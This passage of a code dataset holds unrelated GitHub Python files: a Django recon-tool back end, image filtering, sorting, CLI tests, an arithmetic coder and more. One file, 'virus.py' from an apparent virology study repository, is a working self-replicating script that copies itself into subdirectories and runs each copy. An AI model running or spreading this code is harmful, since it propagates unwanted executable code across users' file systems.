CurrentUser(object):\n def __init__(self):\n pass\n\n @staticmethod\n def list(user):\n current_info = {\n 'name': user.username,\n 'avatar': 'user',\n 'userid': user.id,\n 'email': 'Toy4Recon',\n 'signature': '海纳百川,有容乃大',\n 'title': '安全专家',\n 'group': '某某某事业群-某某平台部-某某技术部-UED',\n 'tags': [\n {\n 'key': '0',\n 'label': '很有想法的',\n },\n {\n 'key': '5',\n 'label': '海纳百川',\n },\n ],\n 'notifyCount': 12,\n 'unreadCount': 0,\n 'country': 'China',\n 'geographic': {\n 'province': {\n 'label': '辽宁省',\n 'key': '330000',\n },\n 'city': {\n 'label': '沈阳市',\n 'key': '330100',\n },\n },\n 'address': 'Nowhere',\n 'phone': 
'000-888888888'\n }\n\n return current_info\n\n\nclass Settings(object):\n def __init__(self):\n pass\n\n @staticmethod\n def list(kind, activated):\n if activated is True or activated == 'true':\n # 获取激活的配置\n try:\n model = SettingModel.objects.get(kind=kind, activating=True)\n result = SettingSerializer(model, many=False).data\n result = Settings._deal_pasword_field(result, 'RPC_TOKEN')\n CODE = 200\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n return context\n except Exception as E:\n CODE = 404\n logger.warning(E)\n logger.warning(\"存在多个激活配置\")\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n\n models = SettingModel.objects.filter(kind=kind)\n result = SettingSerializer(models, many=True).data\n result = Settings._deal_pasword_field(result, 'RPC_TOKEN')\n CODE = 200\n context = list_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n return context\n\n @staticmethod\n def list_activated_setting(kind):\n try:\n model = SettingModel.objects.get(kind=kind, activating=True)\n result = SettingSerializer(model, many=False).data\n return result\n except Exception as E:\n return None\n\n @staticmethod\n def create(kind, tag, setting):\n if isinstance(setting, str):\n setting = json.loads(setting)\n\n defaultDict = {'kind': kind, 'tag': tag, 'setting': setting, } # 没有该主机数据时新建\n model, created = SettingModel.objects.get_or_create(kind=kind, setting=setting, defaults=defaultDict)\n if created is True:\n result = SettingSerializer(model, many=False).data\n CODE = 201\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n return context\n # 有历史数据\n with transaction.atomic():\n try:\n model = SettingModel.objects.select_for_update().get(id=model.id)\n model.tag = tag\n model.save()\n result = SettingSerializer(model, many=False).data\n CODE = 201\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n return context\n except Exception as E:\n logger.error(E)\n result = SettingSerializer(model, many=False).data\n CODE = 405\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n\n @staticmethod\n def update(id, activating, tag, setting):\n if activating is True:\n # 配置激活流程\n try:\n model = SettingModel.objects.get(id=id)\n models = SettingModel.objects.filter(kind=model.kind).update(activating=False)\n model.activating = True\n model.save()\n result = SettingSerializer(model, many=False).data\n CODE = 201\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n return context\n except Exception as E:\n logger.warning(E)\n logger.warning(\"尝试激活不存在的配置\")\n CODE = 405\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n else:\n # 更新配置流程\n defaultDict = {'id': id, 'tag': tag, 'setting': setting} # 没有该主机数据时新建\n model, created = SettingModel.objects.get_or_create(id=id, defaults=defaultDict)\n if created is True:\n result = SettingSerializer(model, many=False).data\n CODE = 201\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n return context\n # 有历史数据\n with transaction.atomic():\n try:\n model = SettingModel.objects.select_for_update().get(id=id)\n model.tag = tag\n model.setting = setting\n model.save()\n result = SettingSerializer(model, many=False).data\n CODE = 201\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n return context\n except Exception as E:\n logger.error(E)\n result = SettingSerializer(model, many=False).data\n CODE = 405\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n return 
context\n\n @staticmethod\n def destory(id):\n try:\n row_cont, row_cont_dict = SettingModel.objects.filter(id=id).delete()\n CODE = 204\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n except Exception as E:\n CODE = 404\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n\n @staticmethod\n def _deal_pasword_field(data, field):\n if isinstance(data, dict):\n setting = data.get('setting')\n oldstr = data.get('setting').get(field)\n if len(oldstr) <= 3:\n pass\n else:\n data['setting'][field] = oldstr[0:3] + \"*************\"\n return data\n elif isinstance(data, list):\n for one in data:\n setting = one.get('setting')\n oldstr = one.get('setting').get(field)\n if len(oldstr) <= 3:\n pass\n else:\n one['setting'][field] = oldstr[0:3] + \"*************\"\n return data\n else:\n return data\n\n\nclass Project(object):\n\n def __init__(self):\n pass\n\n @staticmethod\n def list():\n Project._check_defalut_project_exist()\n models = ProjectModel.objects.all()\n result = ProjectSerializer(models, many=True).data\n CODE = 200\n context = list_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n return context\n\n @staticmethod\n def create(tag, name, desc):\n defaultDict = {'tag': tag, 'name': name, 'desc': desc, } # 没有该主机数据时新建\n model, created = ProjectModel.objects.get_or_create(tag=tag, name=name, desc=desc, defaults=defaultDict)\n if created is True:\n result = ProjectSerializer(model, many=False).data\n CODE = 201\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n return context\n else:\n result = ProjectSerializer(model, many=False).data\n CODE = 201\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n return context\n\n @staticmethod\n def update(id, tag, name, desc):\n try:\n model = ProjectModel.objects.get(id=id)\n except Exception as E:\n CODE = 404\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n if id == 0:\n model.tag = 'default'\n else:\n if model.tag == 'default':\n model.tag = 'other'\n else:\n model.tag = tag\n\n model.name = name\n model.desc = desc\n model.save()\n result = ProjectSerializer(model, many=False).data\n CODE = 201\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n return context\n\n @staticmethod\n def destory(id):\n # 删除本表信息\n\n try:\n model = ProjectModel.objects.get(id=id)\n except Exception as E:\n CODE = 404\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n try:\n row_cont, row_cont_dict = ProjectModel.objects.filter(id=id).delete()\n # 删除关联表信息\n IPaddress.destory_by_pid(id)\n Task.destory_by_pid(id)\n Website.destory_by_pid(id)\n\n CODE = 204\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n\n except Exception as E:\n logger.error(E)\n CODE = 406\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n\n @staticmethod\n def _check_defalut_project_exist():\n \"\"\"检查默认项目是否存在\"\"\"\n if ProjectModel.objects.filter(id=0).count() < 1:\n model = ProjectModel()\n model.id = 0\n model.tag = 'default'\n model.name = '默认项目'\n model.desc = '该项目为系统默认项目'\n model.save()\n\n\nclass Task(object):\n\n def __init__(self):\n pass\n\n @staticmethod\n def list(pid):\n models = TaskModel.objects.filter(pid=pid).order_by('start_time').reverse()\n result = TaskSerializer(models, many=True).data\n CODE = 200\n for one in result:\n start_time = one.get('start_time')\n end_time = one.get('end_time')\n\n if end_time is None or end_time <= 0:\n used_time = 
int(time.time()) - start_time\n else:\n used_time = end_time - start_time\n one['used_time'] = used_time\n context = list_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n return context\n\n @staticmethod\n def create(pid, kind, kwargs):\n defaultDict = {'pid': pid, 'kind': kind, 'kwargs': kwargs, } # 没有该主机数据时新建\n model, created = TaskModel.objects.get_or_create(pid=pid, kind=kind, kwargs=kwargs, defaults=defaultDict)\n if created is True:\n task_id = CeleryTask.call_task(kind=kind, kwargs=kwargs)\n if task_id is not None:\n model.task_id = task_id\n model.status = 'PENDING'\n model.start_time = int(time.time())\n model.save()\n result = TaskSerializer(model, many=False).data\n CODE = 201\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n else:\n CODE = 405\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n else:\n if model.status in ['PENDING', 'STARTED', 'PROGRESS']:\n result = TaskSerializer(model, many=False).data\n CODE = 201\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n else:\n task_id = CeleryTask.call_task(kind=kind, kwargs=kwargs)\n if task_id is not None:\n model.task_id = task_id\n model.status = 'PENDING'\n model.start_time = int(time.time())\n model.end_time = 0\n model.save()\n result = TaskSerializer(model, many=False).data\n CODE = 201\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), result)\n else:\n CODE = 405\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n\n @staticmethod\n def update_task(task_id, status, retval, einfo):\n try:\n model = TaskModel.objects.get(task_id=task_id)\n except Exception as E:\n logger.warning(\"未找到对应的task信息,task: {} exception: {}\".format(task_id, E))\n return False\n # 调用task回调函数\n if status == \"SUCCESS\" or status == b\"SUCCESS\":\n flag = CeleryTask.result_callback(model.pid, model.kind, retval)\n if flag is True:\n model.status = 'STORED'\n model.end_time = int(time.time())\n model.save()\n return True\n else:\n logger.warning(\"存储任务结果失败,task_id: {},kind: {},retval: {}\".format(task_id, model.kind, retval))\n model.status = 'STOREFAIL'\n model.end_time = int(time.time())\n model.save()\n return False\n else:\n logger.warning(\"任务执行失败,task_id: {},status: {},einfo: {}\".format(task_id, status, einfo))\n model.status = status\n model.end_time = int(time.time())\n model.save()\n return False\n\n @staticmethod\n def destory(id):\n try:\n model = TaskModel.objects.get(id=id)\n except Exception as E:\n CODE = 404\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n if model.status in ['STARTED', 'PROGRESS']:\n CODE = 400\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n\n try:\n row_cont, row_cont_dict = TaskModel.objects.filter(id=id).delete()\n CODE = 204\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n\n except Exception as E:\n logger.error(E)\n CODE = 406\n context = dict_data_return(CODE, CODE_MESSAGE.get(CODE), {})\n return context\n\n @staticmethod\n def destory_by_pid(pid):\n try:\n row_cont, row_cont_dict = TaskModel.objects.filter(pid=pid).delete()\n return row_cont\n except Exception as E:\n logger.error(E)\n return None\n","repo_name":"p4sschen/Toy4Recon","sub_path":"Core/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":16140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26981463250","text":"# Author - Rohit Kishor Asegaonkar\n# Div-A Batch - 
B1\n# Roll No.-09 Gr. No.- 11810636 \n\nimport cv2\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt \n \nimage = cv2.imread('images/spider.jpeg')\nimage2 = cv2.imread('Results/CameraImage2.png')\n\nkern1 = cv2.getGaborKernel((5, 5), 2.0, 0, 4.0, 0.5, 0, ktype=cv2.CV_64F)\nkern2 = cv2.getGaborKernel((5, 5), 2.0, np.pi/4, 4.0, 0.5, 0, ktype=cv2.CV_64F)\nkern3 = cv2.getGaborKernel((5, 5), 2.0, np.pi/2, 4.0, 0.5, 0, ktype=cv2.CV_64F)\n\nfiltered_img_zero = cv2.filter2D(image,-1,kern1)\nfiltered_img_fortyfive = cv2.filter2D(image,-1,kern2)\nfiltered_img_ninety = cv2.filter2D(image,-1,kern3)\n\nres = cv2.add(filtered_img_zero,filtered_img_ninety)\nres1 = cv2.add(res,filtered_img_fortyfive)\n\nkern1_test = cv2.getGaborKernel((5, 5), 2.0, 0, 4.0, 0.5, 0, ktype=cv2.CV_64F)\nkern2_test = cv2.getGaborKernel((5, 5), 2.0, np.pi/6, 4.0, 0.5, 0, ktype=cv2.CV_64F)\nkern3_test = cv2.getGaborKernel((5, 5), 2.0, np.pi/3, 4.0, 0.5, 0, ktype=cv2.CV_64F)\n\nfiltered_img_zero_test = cv2.filter2D(image,-1,kern1_test)\nfiltered_img_fortyfive_test = cv2.filter2D(image,-1,kern2_test)\nfiltered_img_ninety_test = cv2.filter2D(image,-1,kern3_test)\n\nres_test = cv2.add(filtered_img_zero_test,filtered_img_ninety_test)\nres1_test = cv2.add(res_test,filtered_img_fortyfive_test)\n\nerror = cv2.norm(res1, res1_test, normType=cv2.NORM_L2)\nprint(error)\n\ntextstr = \"Euclidean Distance Between two images is \" + str(error)\nplt.gcf().text(0.4, 0.1, textstr, fontsize=14)\nplt.subplot(131)\nplt.title(\"Original Image\")\nplt.imshow(image)\nplt.subplot(132)\nplt.title(\"Filtered Image\")\nplt.imshow(res1)\nplt.subplot(133)\nplt.title(\"Test Image\")\nplt.imshow(res1_test)\nplt.show()","repo_name":"RohitAsegaonkar/vision-based-automation-lab","sub_path":"gaborusingcv2.py","file_name":"gaborusingcv2.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"25959588742","text":"from numpy import *\nimport random\ndef mergesort(lyst):\n\t'''\n\tlyst:list being sorted\n\tcopyBuffer temporary space needed during merge\n\t'''\n\tcopyBuffer = zeros(len(lyst))\n\tmergeSortHelper(lyst,copyBuffer,0,len(lyst)-1)\n\t\ndef mergeSortHelper(lyst,copyBuffer,low,high):\n\t'''\n\tlyst : list being sorted\n\tcopyBuffer temp space needed during merge\n\tlow,high : bounds of sublist\n\tmiddle : midpoint of sublist\n\t'''\n\tif low < high:\n\t\tmiddle = (low + high) // 2\n\t\tmergeSortHelper(lyst,copyBuffer,low,middle)\n\t\tmergeSortHelper(lyst,copyBuffer,middle + 1,high)\n\t\tmerge(lyst,copyBuffer,low,middle,high)\n\ndef merge(lyst,copyBuffer,low,middle,high):\n\t\n\t'''\n\tInitialize i1 and i2 to the first items in each sublist\n\t'''\n\ti1 = low\n\ti2 = middle + 1\n\t\n\tfor i in range(low,high + 1):\n\t\tif i1 > middle:\n\t\t\tcopyBuffer[i] = lyst[i2] #First sublist exhausted\n\t\t\ti2 += 1\n\t\telif i2 > high:\n\t\t\tcopyBuffer[i] = lyst[i1] #Second sublist exhausted\n\t\t\ti1 += 1\n\t\telif lyst[i1] < lyst[i2]:\n\t\t\tcopyBuffer[i] = lyst[i1]\n\t\t\ti1 += 1 #Item in first sublist <\n\t\telse:\n\t\t\tcopyBuffer[i] = lyst[i2]\n\t\t\ti2 += 1 #Item in second sublist <\n\t\n\t\n\tfor i in range(low,high + 1): #copy sorted items back to\n\t\tlyst[i] = copyBuffer[i] #propre position in lyst\n\t\t\n\t\t\ndef main(size = 20,sort = mergesort):\n\tlyst = []\n\tfor count in range(size):\n\t\tlyst.append(random.randint(1,size+1))\n\tprint(lyst)\n\tsort(lyst)\n\tprint(lyst)\n\nif __name__ == 
\"__main__\":\n\tmain()\n","repo_name":"Nine-Songs/Fundamentals_of_Python","sub_path":"03/mergeSort1.py","file_name":"mergeSort1.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8293602854","text":"import sys\nfrom argparse import Namespace\nfrom io import StringIO\nfrom pathlib import Path\nfrom tempfile import TemporaryDirectory\n\nfrom un_yaml import UnCli, UnUri, __version__\n\nfrom .conftest import SRC_PACKAGE, TEST_URI, pytest, pytestmark # NOQA F401\n\n\n@pytest.fixture\ndef cli():\n return UnCli(SRC_PACKAGE, __version__)\n\n\n@pytest.fixture\ndef buf():\n result = StringIO()\n yield result\n result.close()\n\n\ndef test_cli(cli: UnCli):\n assert cli\n commands = cli.get(UnCli.K_CMD)\n assert commands\n assert \"list\" in commands\n\n\ndef test_cli_arg():\n d = {\"type\": \"Path\"}\n kw = UnCli.VALID_KEYS(d)\n assert kw\n\n\nasync def test_cli_parser(cli: UnCli, buf: StringIO):\n argv = [\"--version\"]\n parser = cli.make_parser()\n assert parser\n assert cli.parse(argv)\n await cli.run(argv, buf)\n assert \"un_yaml\" in buf.getvalue()\n\n\ndef test_cli_parse_arg(cli: UnCli):\n argv = [\"list\", TEST_URI]\n names = cli.parse(argv)\n assert isinstance(names, Namespace)\n assert names.command == \"list\"\n uri = names.uri\n assert isinstance(uri, UnUri)\n assert str(uri) == TEST_URI\n\n\ndef test_cli_parse_opt(cli: UnCli):\n argv = [\"get\", TEST_URI] # , \"--dir\", \".\"\n names = cli.parse(argv)\n assert isinstance(names, Namespace)\n assert names.command == \"get\"\n assert hasattr(names, \"dir\")\n assert names.dir == Path(\".\")\n assert not names.verbose\n\n\nasync def test_cli_verbose(cli: UnCli, buf: StringIO):\n argv = [\"get\", TEST_URI, \"--verbose\"] # , \"--dir\", \".\"\n names = cli.parse(argv)\n assert isinstance(names, Namespace)\n assert names.verbose\n\n\nasync def test_cli_run(cli: UnCli, buf: StringIO):\n # assert not await cli.run(None, buf) FAILS when using pytest arguments\n assert not await cli.run([], buf)\n await cli.run([\"list\", TEST_URI], buf)\n assert \"list\" in buf.getvalue()\n doc_opts = cli.conf.get(\"doc\")\n assert doc_opts\n uri_opts = doc_opts.get(TEST_URI)\n assert uri_opts\n assert uri_opts.get(UnCli.K_CMD) == \"list\"\n\n\n@pytest.mark.skipif(sys.platform.startswith(\"win\"), reason=\"tmp folder name issue\")\ndef test_cli_conf():\n uri = UnUri(TEST_URI)\n tool = uri.tool()\n argv = {\n UnUri.ARG_URI: uri,\n \"name\": \"test\",\n UnCli.K_CMD: \"list\",\n }\n with TemporaryDirectory() as tmpdir:\n cli = UnCli(pkg=SRC_PACKAGE, dir=tmpdir, version=__version__)\n cf = cli.conf\n assert cf\n assert tmpdir in str(cli.path)\n assert tmpdir in str(cf.path)\n assert \"Wrapper\" == cf.info(\"doc\")\n assert not cf.get(tool)\n\n assert not cli.path.exists()\n cli.log_resource(argv)\n assert cli.path.exists()\n\n contents = cli.path.read_text()\n assert \"name: test\" in contents\n\n opts = cf.get(tool)\n assert opts\n args = opts.get(TEST_URI)\n assert args\n assert args[\"name\"] == \"test\"\n assert args.get(UnUri.ARG_URI, False) is False\n assert args.get(UnCli.K_CMD) == \"list\"\n","repo_name":"data-yaml/un-yaml","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":3001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34899833394","text":"from collections import deque\n\ndef solution(priorities, location):\n # 우선순위와 뽑혀나가는 순서 덱 2개 만듦\n priorities 
= deque(priorities)\n orders = deque(list(range(len(priorities))))\n # 아예 여기는 인덱스를 다르게 처리함. \n # 왜냐면 똑같은 숫자가 여러 개 있을 수 있기 때문에\n orders[location] = 't' \n order = 0\n\n # 큐에 뭔가 있는 동안..\n while priorities:\n # 큐의 맨앞에 있는 것이 최고 우선순위라면\n if priorities[0] == max(priorities):\n order += 1 # 순번이 밀림. 실제로 pop할 때만 order 순번이 추가됨\n if orders[0] == 't': # 만약 우리가 찾던 그 문서라면\n return order # 바로 순번 출력\n priorities.popleft() # 아니라면 그냥 뽑음\n orders.popleft()\n else:\n priorities.rotate(-1)\n orders.rotate(-1)","repo_name":"dev-dain/Dukgorithm","sub_path":"week2/dain/42587.py","file_name":"42587.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"71022086652","text":"import sys\nimport os\nimport random\nimport string\n\n\ndef getRandomString(length):\n letters = string.ascii_lowercase\n result_str = ''.join(random.choice(letters) for i in range(length))\n return result_str\n\ndef copyFileToAnother(finput,foutput):\n with open(finput, \"r\") as f:\n with open(foutput, \"w\") as f1:\n for line in f:\n f1.write(line)\n os.chmod(foutput,0o775)\n\ndef getSubdirectories(path):\n my_dir = []\n directory_contents = os.listdir(path)\n for item in directory_contents:\n if os.path.isdir(item):\n my_dir.append(item)\n #print(\"DEBUG: getSubdirectories:\", my_dir)\n return my_dir\n\ndef sprayToSubDir(actualpath,filename,dirList,mark):\n for dir in dirList:\n newFilename = getRandomString(8)+\".py\"\n if not isMarkHere(actualpath,dir,mark):\n copyFileToAnother(filename,actualpath+\"/\"+dir+\"/\"+newFilename)\n relaunch(actualpath,dir,newFilename)\n\ndef relaunch(actualpath,dir,file):\n os.system(\"cd \"+actualpath+\"/\"+dir+\"/ && \"+\"python \"+file)\n\ndef isMarkHere(actualpath,directory,mark):\n return os.path.exists(actualpath+\"/\"+directory+\"/\"+mark)\n \ndef main(argv):\n if len(argv) != 1:\n print(\"usage: python {0}\".format(argv[0]))\n sys.exit(1)\n\n mark = \"MARK\"\n dirpath = os.getcwd()\n print(\"---------------\"+dirpath+\"----------------\")\n #print(\"DEBUG: main, actualpath='\"+dirpath+\"'\")\n subdirectories = getSubdirectories(dirpath)\n sprayToSubDir(dirpath,argv[0],subdirectories,mark)\n\nif __name__ == \"__main__\":\n main(sys.argv)","repo_name":"DamienGounot/VirologyPlayground","sub_path":"playground/virus.py","file_name":"virus.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34691597869","text":"# The program which takes specific traders' list and figures out top three traders who gave maximum contribution to overall trade\r\n\r\ndef remove_duplicates(customers):\r\n \"\"\"takes list and removes duplicates from it\"\"\"\r\n customer_names = []\r\n \r\n for customer_name in customers:\r\n no_of_occurance = customers.count(customer_name)\r\n\r\n # if no of occurance more than one it'll remove customer name \r\n if no_of_occurance > 1:\r\n customers.remove(customer_name)\r\n\r\n # it appends customer name only if it's not present in list named customer_names\r\n if customer_name not in customer_names:\r\n customer_names.append(customer_name)\r\n else:\r\n customer_names.append(customer_name)\r\n return customer_names\r\n\r\n\r\ndef top_three_contributors(contribution_in_trades):\r\n \"\"\"returns top three contributors\"\"\"\r\n # distributing customer names and contribution in separate lists\r\n customer_names = list(contribution_in_trades.keys())\r\n contribution = 
list(contribution_in_trades.values())\r\n top_contributors = []\r\n\r\n # looping three times for getting top three contributors\r\n for top_contributor_no in range(3):\r\n # finding max contribution and assigning its index \r\n max_contributor_index = contribution.index(max(contribution)) \r\n\r\n # it appends customer name only if customer name not already present in top contributors\r\n if customer_names[max_contributor_index] not in top_contributors: \r\n top_contributors.append(customer_names[max_contributor_index])\r\n \r\n # deleting items of top contributors to get rid of duplication\r\n contribution.__delitem__(max_contributor_index)\r\n customer_names.__delitem__(max_contributor_index)\r\n \r\n top_contributors.sort()\r\n return top_contributors\r\n\r\n\r\ndef mostActive(customers):\r\n \"\"\"returns Most active customers' list who trades atleast 5% of total trade\"\"\"\r\n # figuring out unique names\r\n customer_names = remove_duplicates(customers.copy())\r\n # for customer name and their no of trades\r\n customer_trades = {}\r\n # for customer's contribution in trade (in percentage)\r\n contribution_in_trades = {}\r\n # figuring out total trades by length of customers who trades\r\n total_trades = len(customers)\r\n\r\n # looping through customer_names to store no of trades and percentage of contribution\r\n for customer_name in customer_names:\r\n no_of_trades = customers.count(customer_name) # counting customer trades\r\n customer_trades[customer_name] = no_of_trades # storing no of trades \r\n contribution_in_trades[customer_name] = no_of_trades / total_trades # storing contribution in trades (in percentage)\r\n \r\n # getting list of top contributors and returning to main\r\n top_contributors = top_three_contributors(contribution_in_trades) \r\n return top_contributors\r\n \r\n\r\nif __name__ == '__main__':\r\n no_of_customers = int(input(\"Total customers : \"))\r\n\r\n customers = []\r\n # taking customers names from user and storing in list named customers\r\n for i in range(no_of_customers):\r\n customer_name = input()\r\n customers.append(customer_name)\r\n\r\n # gets list of most active customers and prints\r\n most_active_customers = mostActive(customers)\r\n print(\"\\nMost active customers are as follows:\")\r\n for i, most_active_customer in enumerate(most_active_customers, 1):\r\n print(i, most_active_customer.title())\r\n\r\n","repo_name":"Kuldeepbhavsar7/Python-programs","sub_path":"Top traders.py","file_name":"Top traders.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26823853457","text":"import bitfile\nEOF_CHAR=256\nPRECISION=16\nMSB_MASK=((1<<(PRECISION-1))-1)\nMAX_PROBABILITY=(1<<(PRECISION-2))\nclass ArithmeticCodeError(Exception):\n pass\nclass ArithmeticCode:\n def __init__(self,static=True):\n self._lower=0\n self._upper=0xFFFF\n self._code=0\n self._underflow_bits=0\n self._ranges=[0 for i in range(self.upper(EOF_CHAR)+1)]\n self._cumulative_prob=0\n self._infile=None\n self._outfile=None\n self._static_model=static\n @staticmethod\n def mask_bit(x):\n return(1<<(PRECISION-(1+x)))\n @staticmethod\n def lower(c):\n if type(c)==str:\n return ord(c)\n return c\n @staticmethod\n def upper(c):\n if type(c)==str:\n return ord(c)+1\n return c+1\n def encode_file(self,input_file_name,output_file_name):\n if(self._infile is not None)or(self._outfile is not None):\n raise ValueError('I/O operation on opened file.')\n if self._static_model:\n 
self._infile=open(input_file_name,'rb')\n self.build_probability_range_list()\n self._infile.seek(0)\n self._outfile=bitfile.BitFile()\n self._outfile.open(output_file_name,'wb')\n self.write_header()\n else:\n self.initialize_adaptive_probability_range_list()\n self._infile=open(input_file_name,'rb')\n self._outfile=bitfile.BitFile()\n self._outfile.open(output_file_name,'wb')\n c=self._infile.read(1)\n while(c!=''):\n self.apply_symbol_range(c)\n self.write_encoded_bits()\n c=self._infile.read(1)\n self._infile.close()\n self.apply_symbol_range(EOF_CHAR)\n self.write_encoded_bits()\n self.write_remaining()\n self._outfile.close()\n def build_probability_range_list(self):\n if self._infile is None:\n raise ArithmeticCodeError('No input file opened for encoding.')\n count_array=[0 for i in range(EOF_CHAR)]\n c=self._infile.read(1)\n while(c!=''):\n count_array[ord(c)]+=1\n c=self._infile.read(1)\n total_count=sum(count_array)\n if total_count>=MAX_PROBABILITY:\n rescale_value=(total_count/MAX_PROBABILITY)+1\n for index,value in enumerate(count_array):\n if value>rescale_value:\n count_array[index]=value/rescale_value\n elif value!=0:\n count_array[index]=1\n self._ranges=[0]+count_array+[1]\n self._cumulative_prob=sum(count_array)\n self.symbol_count_to_probability_ranges()\n def symbol_count_to_probability_ranges(self):\n self._ranges[0]=0\n self._ranges[self.upper(EOF_CHAR)]=1\n self._cumulative_prob+=1\n for c in range(EOF_CHAR+1):\n self._ranges[c+1]+=self._ranges[c]\n def write_header(self):\n if self._outfile is None:\n raise ArithmeticCodeError('No output file opened for encoding.')\n previous=0\n for c in range(EOF_CHAR):\n if self._ranges[self.upper(c)]>previous:\n self._outfile.put_char(c)\n previous=(self._ranges[self.upper(c)]-previous)\n self._outfile.put_bits_ltom(previous,(PRECISION-2))\n previous=self._ranges[self.upper(c)]\n self._outfile.put_char(0)\n previous=0\n self._outfile.put_bits_ltom(previous,(PRECISION-2))\n def initialize_adaptive_probability_range_list(self):\n self._ranges=[i for i in range(self.upper(EOF_CHAR)+1)]\n self._cumulative_prob=EOF_CHAR+1\n def apply_symbol_range(self,symbol):\n range=self._upper-self._lower+1\n rescaled=self._ranges[self.upper(symbol)]*range\n rescaled/=self._cumulative_prob\n self._upper=self._lower+rescaled-1\n rescaled=self._ranges[self.lower(symbol)]*range\n rescaled/=self._cumulative_prob\n self._lower=self._lower+rescaled\n if not self._static_model:\n self._cumulative_prob+=1\n for i in range(self.upper(symbol),len(self._ranges)):\n self._ranges[i]+=1\n if self._cumulative_prob>=MAX_PROBABILITY:\n original=0\n for i in range(1,len(self._ranges)):\n delta=self._ranges[i]-original\n original=self._ranges[i]\n if delta<=2:\n self._ranges[i]=self._ranges[i-1]+1\n else:\n self._ranges[i]=self._ranges[i-1]+(delta/2)\n self._cumulative_prob=self._ranges[self.upper(EOF_CHAR)]\n def write_encoded_bits(self):\n if self._outfile is None:\n raise ArithmeticCodeError('No output file opened for encoding.')\n mask_bit_zero=self.mask_bit(0)\n mask_bit_one=self.mask_bit(1)\n while True:\n if(self._upper^~self._lower)&mask_bit_zero:\n self._outfile.put_bit((self._upper&mask_bit_zero)!=0)\n while self._underflow_bits>0:\n self._outfile.put_bit((self._upper&mask_bit_zero)==0)\n self._underflow_bits-=1\n elif(~self._upper&self._lower)&mask_bit_one:\n self._underflow_bits+=1\n self._lower&=~(mask_bit_zero|mask_bit_one)\n self._upper|=mask_bit_one\n else:\n return\n self._lower&=MSB_MASK\n self._lower<<=1\n self._upper&=MSB_MASK\n 
self._upper<<=1\n self._upper|=0x0001\n def write_remaining(self):\n if self._outfile is None:\n raise ArithmeticCodeError('No output file opened for encoding.')\n mask_bit_one=self.mask_bit(1)\n self._outfile.put_bit((self._lower&mask_bit_one)!=0)\n self._underflow_bits+=1\n for i in range(self._underflow_bits):\n self._outfile.put_bit((self._lower&mask_bit_one)==0)\n def decode_file(self,input_file_name,output_file_name):\n if(self._infile is not None)or(self._outfile is not None):\n raise ValueError('I/O operation on opened file.')\n self._infile=bitfile.BitFile()\n self._infile.open(input_file_name,'rb')\n if self._static_model:\n self.read_header()\n else:\n self.initialize_adaptive_probability_range_list()\n self.initialize_decoder()\n self._outfile=open(output_file_name,'wb')\n while True:\n unscaled=self.get_unscaled_code()\n c=self.get_symbol_from_probability(unscaled)\n if c==EOF_CHAR:\n break\n self._outfile.write(chr(c))\n self.apply_symbol_range(c)\n self.read_encoded_bits()\n self._outfile.close()\n self._infile.close()\n def read_header(self):\n if self._infile is None:\n raise ArithmeticCodeError('No input file opened for decoding.')\n self._cumulative_prob=0\n self._ranges=[0 for i in range(self.upper(EOF_CHAR)+1)]\n count=0\n while True:\n c=self._infile.get_char()\n count=self._infile.get_bits_ltom(PRECISION-2)\n if count==0:\n break\n elif self._ranges[self.upper(c)]!=0:\n raise ArithmeticCodeError('Duplicate entry for '+hex(ord(c))+' in header.')\n self._ranges[self.upper(c)]=count\n self._cumulative_prob+=count\n self.symbol_count_to_probability_ranges()\n def initialize_decoder(self):\n self._code=0\n for i in 